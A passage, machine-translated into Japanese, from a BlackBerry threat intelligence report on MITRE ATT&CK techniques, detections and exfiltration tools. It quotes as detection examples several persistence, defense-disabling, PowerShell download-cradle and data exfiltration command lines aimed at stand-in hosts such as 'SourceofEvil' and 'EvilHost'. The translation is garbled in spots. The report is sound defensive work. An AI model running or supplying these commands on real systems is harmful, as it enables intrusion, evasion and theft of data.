|
| マスカレード |
↓
|
| アプリケーション層プロトコル |
↓
|
| 非アプリケーション層プロトコル |
↓
|
| リモート・システム・ディスカバリー |
↓
|
| ブートまたはログオンの自動開始実行 |
↑
|
| レジストリの実行キー / スタートアップフォルダ |
↓
|
| アプリケーション・ウィンドウの発見 |
↓
|
| インペア・ディフェンス |
↑
|
| ツールの無効化または変更 |
↓
|
| スケジュールされたタスク/ジョブ |
↓
|
| 現地システムからのデータ |
↑
|
MITRED3FEND™を使用して、BlackBerry Threat Research and Intelligence Team はこの報告期間中に観測されたテクニックに対する完全な対策リストを作成し、GitHub で公開しています。攻撃者は、攻撃を成功させるための重要な情報を収集するために、最もよく知られている上位 3 つのテクニックを使用します。適用された対策のセクションでは、その使用例と監視に役立つ情報について説明します。テクニックと戦術の合計のインパクト評価は、この図で見ることができます。
検出された戦術
この報告期間では、同じ割合で観察された2つの戦術がある。特権のエスカレーションと 防御回避で23%、次いでディスカバリーで19%である。これらは前期の上位戦術と同じである。
-
応用対策
BlackBerry Research and Intelligence Teamは、最もよく観察された5つのMITREテクニックを分析した:
-
ハイジャック実行フロー - T1574
ハイジャック実行フロー(T1574) は、システムの正常な実行フローを傍受して操作し、代わりに悪意あるコードを実行できるようにするために、敵が採用する巧妙な技法です。この手法は前四半期に非常に多く見られ、永続性を達成し、不正なアクションを実行するのに有効であるため、その人気の高さを示しています。
この手法には、DLLの検索順序の乗っ取り、DLLのサイドローディング、正当なプロセスへの悪意のあるコードの注入など、複数の活用ルートがある。実行フローをハイジャックすることで、攻撃者は標準的なセキュリティ警告をトリガーすることなく、システムをコントロールすることができます。このため、セキュリティ・ツールは、脅威者による今後の活動を検知し、防止することが難しくなります。例えば、悪意のある DLL を、正規の DLL よりも先に検索される場所に配置することで、攻撃者は、正規のアプリケーションが DLL をロードしたときに、自分のコードが確実に実行されるようにすることができます。
敵対者にとってこの手法の大きな利点の一つは、セキュリティ対策を回避できることである。悪意のあるコードは信頼されたプロセスのコンテキストで実行されるため、プロセスの動作分析に依存する従来のセキュリティ・メカニズムを回避することができる。この能力は、特権の昇格からデータの流出まで、幅広い悪意のある活動を実行するために使用できるため、ハイジャック実行フローを特に危険なものにしています。
T1574 を防御するために、組織は、アプリケーションのホワイトリスト化、厳格なパッチ管理、システ ムとネットワーク活動の継続的な監視などの包括的なセキュリティ対策を実施する必要がある。ソフトウェアを定期的に更新し、許可されたアプリケーションのみが実行できるようにすることで、実行フローハイジャックのリスクを大幅に低減することができます。
また、ユーザ意識向上トレーニングは、従業員が潜在的な実行フローハイジャックの兆候を認識する上で重要な役割を果たし、強固なセキュリティ体制の構築に貢献する。最後に、この手法に関連する異常な動作パターンを識別できる高度な脅威検知ソリューションを採用することは、タイムリーな検知と対応に不可欠です。T1574 の使用例には、次のようなものがあります:
- DLL 検索順序のハイジャック:よくある例は、Windows の DLL 検索順序の悪用です。攻撃者が悪意のあるmsvcrt.dllをアプリケーションの作業ディレクトリに置くと、システムディレクトリにある正規のバージョンではなく、アプリケーションによって読み込まれる可能性があります。
- DLLのサイドローディング2018年、APTグループOceanLotusは、正規のMicrosoft Word実行ファイルにDLLサイドローディングを使用して悪意のあるDLLをロードし、永続性を確立してさらなるペイロードを実行しました。
- COMハイジャック:攻撃者は、正規のアプリケーションが頻繁に問い合わせを行う特定のレジストリ・キーの下に、悪意のあるCOMオブジェクトを登録します。アプリケーションがCOMオブジェクトを呼び出すと、意図したCOMオブジェクトの代わりに悪意のあるコードが実行されます。
- Windows の AppInit_DLL:AppInit_DLLsのようなレジストリ・キーを変更することで、攻撃者は悪意のあるDLLが該当するすべてのプロセスにロードされるようにし、これらのプロセスを制御できるようにします。
- 正規プロセスへのインジェクション:この手法では、ペイロードが正規のプロセスにインジェクションされ、セキュリティソフトウェアによる検出を回避します。
-
ブートまたはログオンの自動開始実行 - T1547
Boot or Logon Autostart Execution (T1547) の手法では、攻撃者はまず、システムの起動時またはユーザーのログイン時にマルウェアが自動的に実行されるようにします。その後、攻撃者は、レジストリ キー、スタートアップ フォルダ、スケジュールされたタスク、またはサービス登録などのメカニズムを使用して、持続性を維持したり、侵害されたシステム上で昇格した特権を獲得したりします。これらのメカニズムは、オペレーティング・システム上の正当なソフトウェア機能やシステム管理タスクを容易にするように設計されています。しかし、敵対者はこれらの機能を悪用して悪意のあるコードを埋め込み、通常のシステム操作に紛れ込ませることができます。これらの重要なオペレーティング・システムのメカニズムを理解し、安全性を確保することは、不正な永続化と特権の昇格から保護するために不可欠です。
以下は、永続性を確立するために頻繁に使用されるレジストリキーの場所の例である:
これは、オペレーティング・システムの起動時に自動的に実行されるプ ログラムを設定するために使用されるWindowsレジストリである。
永続性を確立するために使用されるスタートアップフォルダーの例は以下の通りである:
このパスは、ユーザーがログオンしたときに自動的に起動するプログラムへの ショートカットが置かれるスタートアップフォルダーにつながる。
以下は、サービス作成を永続化に活用する方法の例である:
'sc create Updater binPath= "C:˶Windowsmalicious[.]exe" start= auto' - このコマンドはサービスユーティリティを利用して、システム起動時に自動的に開始するように構成された「Updater」という名前のサービスを作成します。
永続性を確立し、昇格した特権を得るもう一つの例は、ウィンドウズのタスクスケジューラを通したものである:
schtasks /create /tn "Updater" /tr "C:˶Windowsmalicious[.]exe" /sc onlogon /ru SYSTEM' - このコマンドは、ユーザーがログオンするたびに指定された場所で実行ファイルmalicious.exeを実行する「Updater」という名前のスケジュールタスクを作成します。
-
インペア・ディフェンス - T1562
MITREのImpair Defenses (T1562)は、Defence Evasion (TA0005)という戦術の下で、この報告期間中に敵が使用した最も一般的な上位5つのテクニックの1つとして認識されました。このテクニックは、被害者の環境の要素を変化させ、防御メカニズムを妨げたり無効にしたりする。敵対者は、ファイアウォールやアンチウイルス(AV)ソフトウェアのような予防的防御を損なうだけでなく、防御者が活動を監査し、悪意のある行動を特定するために使用する検出機能も妨害します。
脅威行為者が被害者の防御をうまく妨害すると、検知されずに攻撃する自由が得られます。これにより、悪意のあるバイナリを注入し、キーロガー、ワーム、トロイの木馬、悪意のあるウェブシェルなど、MITREの他のテクニックを悪用することが可能になります。これらはすべて、マシン上でランサムウェアを実行させることにつながる。
このような攻撃からシステムを守るためには、MITREのテクニックT1562に対する防御策を採用することが極めて重要です。この技法は攻撃の初期に使用されることが多いため、できるだけ早期に発見し、対策することが重要です。
以下は、監視に便利なコマンドラインのリストである:
- sc stop <ServiceName>
- sc config <ServiceName> start=disabled
- net stop <ServiceName>
- taskkill /IM <ToolName> /F
- netsh advfirewall set allprofiles state off
- bcdedit.exe /deletevalue {default} セーフブート
- bcdedit /set {default} recoveryenabled no
-
アプリケーション・ウィンドウの発見 - T1010
BlackBerry のスペシャリストは、Discovery 戦術(TA0007)の下にある Application Window Discovery 戦術(T1010)を、今回の報告期間中にサイバー脅威行為者によって使用された上位の技 術の 1 つとして特定しました。この手法では、開いているWindowsアプリケーションをリストアップし、脅威行為者にターゲットシステムの使用パターンに関する有益な洞察を提供します。この情報は、収集する価値のある特定のデータや、攻撃者が検知を回避するために回避しなければならないセキュリティソフトウェアを特定する上で非常に貴重なものとなります。脅威行為者はこのテクニックを使用して、環境をよりよく理解し、検出されずに可能な限り攻撃的な攻撃を計画します。
開いているWindowsアプリケーションのリストを最初に取得するために、攻撃者は通常、組み込みのシステム機能を悪用する。例えば、必要な情報を収集するために、コマンドやスクリプティング・インタープリターからのコマンドや、ネイティブAPIからの関数を利用するかもしれない。これらのネイティブツールや関数は、疑われる可能性が低く、システムに関する包括的な情報を提供できるため、しばしば使用される。
このような挙動は疑わしいものであり、敵対者に被害者のシステムに関する重要な情報を提供する可能性があることを考えると、敵対者が実行したこれらのコマンドやアクションを検出できるセキュリティ・ソフトウェア構成を持つことが重要である。
以下は、監視に役立つコマンドラインのリストである:
- gps | where {$_.mainwindowtitle}.
- Get-Process| WhereオブジェクトMainWindowTitle
- "cscript.exe"、"rundll32.exe"、"explorer.exe"、"wscript.exe"、"PowerShell.exe"、"pwsh.dll"、"winlogon.exe"、"cmd.exe "は、これらのAPIを使用するための親プロセスです:"user32.dll!GetWindowTextA"、"user32.dll!GetForegroundWindow"、"user32.dll!GetActiveWindow"、"user32.dll!GetWindowTextW"
- タスクリスト & タスクリスト /v
-
ソフトウェア・ディスカバリー - T1518
MITRE ATT&CK フレームワークでは、ディスカバリー戦術(TA0007)の主要なテクニックとしてソフトウェア・ディスカバリー(T1518)を挙げています。この手法は、敵対者が標的とするシステムのソフトウェア環境を把握するために頻繁に使用され、多くのサイバー攻撃において重要なステップとなっています。ソフトウェア・ディスカバリーにより、攻撃者はシステムにインストールされているアプリケーションとバージョンを特定することで、脆弱性を特定することができます。この情報は、攻撃者が古いソフトウェアやパッチが適用されていないソフトウェアを悪用したり、セキュリティ対策を無効にしたり回避したりする方法を計画したり、最大限の効果を得るために攻撃を調整したりするのに役立ちます。
ソフトウェアを発見する一般的な方法には、wmic "product" get name, version, vendorのようなコマンドを使ったWindows Management Instrumentation (WMI)の使用や、Get-ItemPropertyやGet-WmiObjectのようなPowerShellスクリプトがあります。これらの方法によって、攻撃者は詳細なソフトウェア情報を取得し、Windowsレジストリを照会し、実行中のプロセスと関連するアプリケーションを特定することができます。ソフトウェアの発見が成功した場合の影響は大きい。攻撃者は、特定されたソフトウェアの脆弱性を悪用して、特権を昇格させたり、任意のコードを実行したりすることができる。また、セキュリティ防御を無効にしたり、回避したりすることもできるため、発見されずに活動できる可能性が高まります。さらに、敵対者はソフトウェア環境を理解することで、発見されたアプリケーションに特化したマルウェアを展開し、攻撃の有効性とステルス性を高めることができます。
この手口から身を守るために、組織は強固な監視と警告の仕組みを導入すべきである。一般的にソフトウェア発見に関連するコマンドやスクリプトの使用を監視することは不可欠である。行動分析を使用する高度な脅威検知システムを採用することで、通常とは異なる活動を検知することができる。すべてのソフトウェアが最新であり、パッチが適用されていることを確認し、管理ツールの使用を許可された担当者に限定し、コマンド実行の包括的なログを維持することも、重要なステップである。
CylanceMDR データ
このセクションでは、本レポートの報告期間中に脅威の標的となった顧客環境で観測された脅威のうち、特に興味深い検出事例を紹介します。 CylanceMDR本レポートでは、この報告期間中に脅威の標的となった顧客環境で観測された脅威のうち、特に興味深いものを取り上げています。
CylanceMDR は、24時間365日の監視を提供するサブスクリプション・ベースのマネージド検知・対応(MDR)サービスです。このサービスは、顧客のセキュリティ・プログラムのギャップを探る高度なサイバー脅威の阻止を支援します。BlackBerry MDRチームは、この報告期間中に何千ものアラートを追跡しました。以下では、現在の脅威の状況についてさらなる洞察を提供するために、遠隔測定結果を地域ごとに分類しています。
CylanceMDR 観察
今回の報告期間中、前回の報告書と同様に、CylanceMDR チームは、Certutil が全地域のセキュリ ティ・オペレーション・センター(SOC)の大規模な検出源であり続けていることを確認した。
北米/中南米(NALA)および欧州・中東・アフリカ(EMEA)地域では、「PowerShell Download」の検出に関連する活動の傾向も見られました。たとえば、powershell.exe -noexit -ep bypass -command IEX((New-Object System.Net.WebClient).DownloadString('hxxps://SourceofEvil/test[.]ps1')) のようなPowerShell経由のダウンロードクレードルを使用して、MITREのテクニックIngress Tool Transfer (T1105) を達成しようとする敵が見られました。
さらに、前回のレポートではあまり見られなかったBase64エンコーディングの検出数の増加も確認されました。Base64エンコーディングは、脅威行為者がコードを難読化する比較的簡単な方法を提供し、悪意のあるコードを偽装して検出しにくくする可能性があります。しかし、ほとんどの熟練したアナリストは、脅威行為者がBase64を使用していることをよく知っているため、この回避テクニックを特定するために、通常、より成熟したSOCには特別な警戒と検出機能が組み込まれています。
NALA および APAC 地域で特に興味深いのは、この報告期間中に「DLL ロードによる Msiexec の悪用の可能性」に関連するいくつかの検出が確認され始めたことです。Msiexecは、Windowsのコマンドラインユーティリティであり、一般的に.msiインストールパッケージの実行に関連しています。私たちのシステムは、悪意のある DLL ペイロード(MITRE テクニック T1218.007)をプロキシ実行するために Msiexec を悪用しようとする脅威者を検出しています。検出されたコマンドの例は次のとおりです: 'C:⊖windowssystem32⊖msiexec.exe /Z c:⊖programdata⊖evil.dll'。
LOLBAS 活動
この報告期間中、私たちは以下のリビング・オフ・ザ・ランドのバイナリ、スクリプト、ライブラリ(LOLBAS)の活動を観測した:
- Bitsadminは引き続きLOLBASの最高観測値である。
- Certutilは僅差の2位で、前回の報告期間から増加している。
- Regsvr32、MSHTA、MOFCOMPはまだ観測されているが、全体としては低い割合である。
流出ツール
前回のレポートでは、リモート監視・管理(RMM)ツールと、それらが脅威行為者によってどのように悪用されることが多いかを説明した。RMMツールは、攻撃者が永続性とアクセスのしやすさを維持するための簡単な方法を提供し、また顧客環境からデータを簡単に流出させる方法を提供します。実際、研究者は、RMMツールがランサムウェアグループが被害者の環境からデータを流出させるために最も急速に成長しているカテゴリであると報告しています。
この報告期間中に、CylanceMDR は、顧客環境において流出に使用される可能性のある最も一般的なツール(RMM ツールを除く)をレビューした。
ツール
ウィンエスシーピー
説明 WinSCPはファイル転送クライアント、PuTTYはセキュアシェル(SSH)クライアントです。
コマンドライン例:winscp.exe scp://test:P@ss123[at]EvilHost[.]com:2222/ /upload passwords.txt /defaults=auto
注: グラフィカル・ユーザー・インターフェース(GUI)でよく使用される。
ミターアタックIDT1048
Rクローン
説明Rcloneは、クラウドストレージ上のコンテンツを管理するために使用されるコマンドラインユーティリティです。
コマンドライン例:rclone.exe copy "\SERVER↩passwords ftp:EvilCorp↩files" -q --transfers 10
ミッターアタックIDS1040
ファイルジラ
説明FileZillaは、様々なオペレーティングシステムで使用できる有名なファイル転送プロトコル(FTP)ツールです。
コマンドライン例:filezilla.exe -u "ftp://test:p@ss1234[at]ftp.test[.]com" -e "put passwords.txt /remote_directory/pass.txt"
ミターアタックIDT1071.002
PSCP
説明PuTTY Secure Copy Protocol (PSCP) は、ファイルとフォルダの転送に使用されるコマンドラインユーティリティです。
コマンドライン例:pscp.exe -P 22 C:♪Finances.txt root[at]EvilDomain/tmp
ミターアタックIDT1021.004
フリーファイルシンク
説明FreeFileSyncはバックアップを管理するための同期ツールです。
コマンドラインの例FreeFileSync.exe google_drive_sync.ffs_batch
Note: The batch file will contain information regarding the file/folder and the location of the GDrive folder e.g., <Left Path=“C:\sensitiveFiles” /> <Right Path=“D:\GoogleDriveFolder” />
ミターアタックIDT1567.002
要点
流出目的で使用されるツールには多くのバリエーションがあるため、上記のツールのリストは網羅的なものではない。したがって、悪意のある目的に使用される可能性のあるツールの使用から防御する戦略を組織が持つことが重要である。
これらの戦略には以下のようなものがある:
- 情報漏えいによる機密データの紛失、誤用、共有、不正使用や流出を検知・防止するためのデータ損失防止(DLP)ツール。
- 静止時と転送時の暗号化。
- アクセス制御。
- 「最小権限」設定。必要なものだけにアクセスできるようにする。
- 定期的なアカウントの監査 - 例えば、ユーザーが役割を変更した場合、そのユーザーはもはや必要のないデータにアクセスできる可能性がある。
- ネットワーク・セグメンテーション:侵入された場合、明確に定義されたネットワーク・セグメントは、横方向の動きを妨げ、攻撃対象範囲を狭める。
- ネットワークトラフィックを監視する侵入検知システム。
- デフォルト拒否アプローチを適用 - 必要な場合のみ有効にする。例えば
- USBポートやクラウドストレージサービスの使用をブロックする。(例:グループポリシーオブジェクト(GPO)を使用して、USBポートでのデータ転送を無効にする)
- ポートをインターネットに公開すべきではない(例:ポート22(SSH)をインターネットに公開すべきではない)。
- ポート、プロトコル、サービスの使用を制限することで、全体的なリスクを低減します。
- 以下のようなアウトバウンドのトラフィックパターンを監視する:
- 通常の営業時間外における交通量の増加(通常の基準値からの逸脱)。
- ポート22を経由するアウトバウンド・トラフィックが突然増加した場合、pscp.exeのようなツールを使用した流出の可能性がある。
- 前述したように、22のようなポートは、このようなリスクを防ぐために、デフォルト拒否のアプローチを適用すべきである。
- 無効化されたポートやサービスに対するアウトバウンドの試みを監視するためのコントロールを設置する。
- 例えば、脅威行為者がネットワークにアクセスし、これらのポートやサービスを使用可能にしようとした場合、このようなコントロールはセキュリティ・チームに警告を発する。
SOCアナリストの視点から、アナリストが注意すべき例をいくつか挙げてみよう:
ツール名の変更
アナリストは、一般的に使用される流出ツールとそのオプションおよびパラメータを認識しておく必要があります。Rcloneの例である「rclone.exe copy "\SERVERpasswords\ ftp:EvilCorpfiles" -q --transfers 10」を使って、脅威行為者はこれを「svchost.exe copy "\SERVERpasswords\ ftp:EvilCorpfiles" -q --transfers 10」のようなもっと無害なものにリネームするかもしれない。
データ転送量
大規模なデータ転送があったり、アウトバウンドのトラフィックが突然増加したりした場合、アナリストは調査する必要があります。
異常なトラフィック
不明なIPやホストからの予期せぬデータ転送パターンに注意。
ユーザー行動分析
通常アクセスする必要のないファイルにユーザーがアクセスするなど、通常から逸脱したパターンを監視する。例えば、マーケティング・チーム・メンバーのホストが顧客の財務記録にアクセスするような場合です。
結論と見通し
2024年4月から6月までの90日間をカバーするこのレポートは、将来の脅威に関する情報を入手し、それに備えるためのものです。著名な犯罪グループ、特にランサムウェアの運営者は、新たな脆弱性を悪用し、大小のターゲットに価値を見出しています。同レポートで述べられているように、BlackBerry のリサーチャーは、毎日平均11,500以上のユニークなマルウェアのハッシュが捕捉されていることを観測しています。このようなレベルの活動により、業界や地域の最新のセキュリティ・ニュースを常に把握することが極めて重要になっています。
サイバー脅威の現状を踏まえ、我々は今後数ヶ月の脅威を以下のように予測している:
選挙妨害
世界人口の約60%が投票すると予想される2024年は、世界的に選挙にとって重要な年である。 ディープフェイクという比較的新しいメディアを通じた脅威を含め、誤報、偽情報、干渉の試みは、すでに年間を通じて観察されている。悪意ある行為者は、混乱をまき散らし、社会的分裂を煽り、混乱を引き起こすために、この瞬間を捉えようとしている。選挙が近づくにつれ、フェイクニュースや誤報を拡散するキャンペーンは激化し、その努力はエスカレートしていくと予測される。
政治色を帯びたフィッシング・ルアー
マルウェアを拡散させるために、政治的傾向の強い投稿、フォーラム、メーリングリストを悪用することは、近い将来、兵器化された戦術となる可能性がある。様々な政界からの極論を利用することで、脅威者はこの混乱を悪用し、トロイの木馬に感染した政治的な資料を配布し、さらに多くのマルウェアを展開する可能性があります。一般的な戦術には、偽情報をまき散らすソーシャルメディアへの投稿を作成し、ソーシャルメディア・プラットフォーム、インスタント・メッセンジャー、および従来のニュース・メディアで何百万ものクリック数、閲覧数、エンゲージメントを生成することが含まれます。脅威の多くは、このようなソーシャルメディア上の活動を、マルウェア攻撃を行うためのおとりとして利用する可能性があります。
カオスの兵器化
サイバーセキュリティの領域では、どのような種類の混乱も、悪意のある行為者が混乱や誤った情報を悪用するための肥沃な土壌となる。戦争、自然災害、IT の停止など、通常の通信やデータの流れが大きく阻害されるような不安定な状況は、サイバー犯罪者にとって絶好の機会となります。脅威行為者は、偽のフィッシングメール、誤解を招くようなフォーラムへの投稿、有益で文脈に関連したツールを装った悪意のあるソフトウェアを広めることで、このような状況を継続的に活用する態勢を整えている。
ランサムウェアの進化とAI
世界中の法執行機関、法律家、セキュリティ専門家による監視の強化に直面しているランサムウェアの 脅威当事者は、その活動を継続するために戦術、技術、手順(TTP)を進化させる可能性が高い。
この進化には、AI(特にジェネレイティブAI)を活用して、より高度で装甲化されたペイロードや実行チェーンを開発すること、高度で標的を絞ったソーシャル・エンジニアリング攻撃にディープフェイク技術を活用すること、追跡やシャットダウンを回避するためにネットワークやC2インフラを分散化・匿名化すること、運用上のセキュリティを向上させることなどが含まれる。
サイバーセキュリティの脅威と防御の流動的な状況について最新情報を得るには、BlackBerry ブログをご覧ください。
謝辞
この報告書は、才能あるチームと個人の共同作業の賜物である。特に、以下の方々に敬意を表します:
- エイドリアン・チェンバース
- アラン・マッカーシー
- アレクサンドラ・モジル
- アマルカント・ラヴェーンドラン
- アンヌ=カルメン・ディッター
- ダニエル・コリー
- ディーン・ギヴン
- ジェフ・オルーク
- ジョン・デ・ブール
- イスマエル・バレンズエラ・エスペホ
- マリステラ・エイムズ
- ナタリア・チャッポーニ
- ナターシャ・ローナー
- ロナルド・ウェルチ
- サミュエル・リオス
- トラビス・ホクスマイヤー
- ウィリアム・ジョンソン
また、カナダ王立騎馬警察の全国サイバー犯罪調整センターの貢献と協力に感謝したい。
サイバー脅威を常に把握する
お問合せはこちら